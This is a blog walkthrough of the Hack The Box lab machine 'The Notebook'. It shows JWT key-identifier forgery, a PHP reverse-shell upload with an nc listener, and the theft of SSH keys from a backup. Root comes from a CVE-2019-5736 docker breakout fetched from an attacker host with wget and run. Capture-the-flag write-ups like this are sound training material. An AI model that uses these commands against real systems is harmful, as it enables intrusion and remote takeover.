The Notebook Walkthrough – Hackthebox – Writeup

the notebook walkthrough writeup hackthebox

At the time of writing this post, the machine was in active list. So, only proceed if you have tried on your own. Welcome to “The Notebook Walkthrough – Hackthebox – Writeup”.

Note: To write public writeups for active machines is against the rules of HTB. Otherwise, I could protect this blog post using the root flag. Also, I couldn’t find a good content locker that allows custom message for WordPress. So, I couldn’t password protect this blog post using other methods like root hash, root-only readable file contents, etc.

Tech Support Walkthrough – Vulnhub – Writeup

Scan open ports

As usual, I started the exploit by enumerating the open ports.

nmap -T4 -sC -sV -p- --min-rate=1000 -oN nmap.log 10.10.10.230

From the screenshot above, I knew I had to rely on the web server for further enumeration.

Enumerate the webserver

Next, I opened the IP address on my firefox.

I also tried to discover additional file paths, however, I couldn’t find anything. Hence, I decided to fire up the burp suite and register for an account. As soon as I register, I got a JWT token in the response.

Next, I copied the token and pasted it on the jwt.io website to decode it.

Reference: https://blog.pentesteracademy.com/hacking-jwt-tokens-kid-claim-misuse-key-leak-e7fce9a10a9c

It uses a key identifier header that we can misuse to gain access to the system. Likewise, you can see that it might be using a private key to secure the header. So, I am going to host my private key on my network and create a token based on that.

openssl genrsa -out privKey.key 2048
python3 -m http.server 7070

Then, I copied the encoded JWT and set it in the cookies using the firefox developer’s tool.

You can see that, I can see notes and upload files using admin panel. So, I looked at some notes.

From the screenshots above, we see that we can somehow execute php files that could give us a reverse shell. Next, there are regular backups. This means that there might be some cron jobs that we can exploit to escalate further privileges.

So, I copied the shell file and changed the IP and port of my machine.

cp /usr/share/webshells/php/php-reverse-shell.php shell.php
vi shell.php # change ip and port
nc -nlvp 4444 # the port that I am listening on

Next, I uploaded it.

I clicked the “View” button to get the reverse shell.

Finally, I got the access to the machine.

Getting a user’s shell

Now that I have got access to the reverse shell, I improved the dumb shell.

Then, I listed down the users of the machine.

cat /etc/passwd | grep bash

We have a user noah on the target. Now, to get an access to the machine, I already had a hint from one of the notes in the web app. It said that regular backups are being performed. So, I looked at the backups directory.

cd /var/backups
ls -al

On the directory, I found a home backup file. So, I downloaded the file to my local machine.

which python3
python3 -m http.server

On the local machine.

wget http://10.10.10.230:8000/home.tar.gz
tar -xzvf home.tar.gz
cd home/noah
ls -al
cd .ssh
ls -al

Here, we have the private key that could allow us to login as noah.

ssh noah@10.10.10.230 -i id_rsa

Finally, I got the flag.

ls -al
cat user.txt

Root privilege escalation

Finally, I have to escalate the privileges to root. So, I checked for the sudo permissions.

sudo -l

The user could execute some commands on the docker container without requiring a password.

docker --version

Also, the version of docker is 18.06.0-ce and the versions below 18.09.2 suffer from docker container breakout exploits. So, I first run the command.

sudo docker exec -it webapp-dev01 bash

Now, I have to get the root of the host machine.

https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout#runc-exploit-cve-2019-5736

https://github.com/Frichetten/CVE-2019-5736-PoC/blob/master/main.go

I read the information about the exploits and downloaded the exploit to my local machine. Then, I changed the payload according to my requirement.

wget https://raw.githubusercontent.com/Frichetten/CVE-2019-5736-PoC/master/main.go
vi main.go
go build main.go
python3 -m http.server

I added the code to spawn a reverse shell on port 9999.

On the container of the target machine.

wget http://10.10.14.39:8000/main && chmod +x main && ./main

Then, without hurry, while the message “Overwritten /bin/sh successfully” is only present, I executed the following command on another SSH instance.

sudo docker exec -it webapp-dev01 /bin/sh

It gave me the root shell of the target machine.

Update

For those, who are stuck at the privilege escalation step, I have created a demo in gif. Please, check the following dropbox link and make sure you drop a comment if this worked.

https://www.dropbox.com/s/z24z4e2wbwbt7n0/the%20notebook.gif?dl=0

The Notebook Walkthrough – Hackthebox – Writeup
0 0 votes
Article Rating
Subscribe
Notify of
guest
15 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Scroll to top

AdBlock Detected


I am sorry for the popup but it costs me money and time to write these posts.
Please disable the adblocker to proceed.
If you are a regular visitor, you can buymeacoffee too. 😉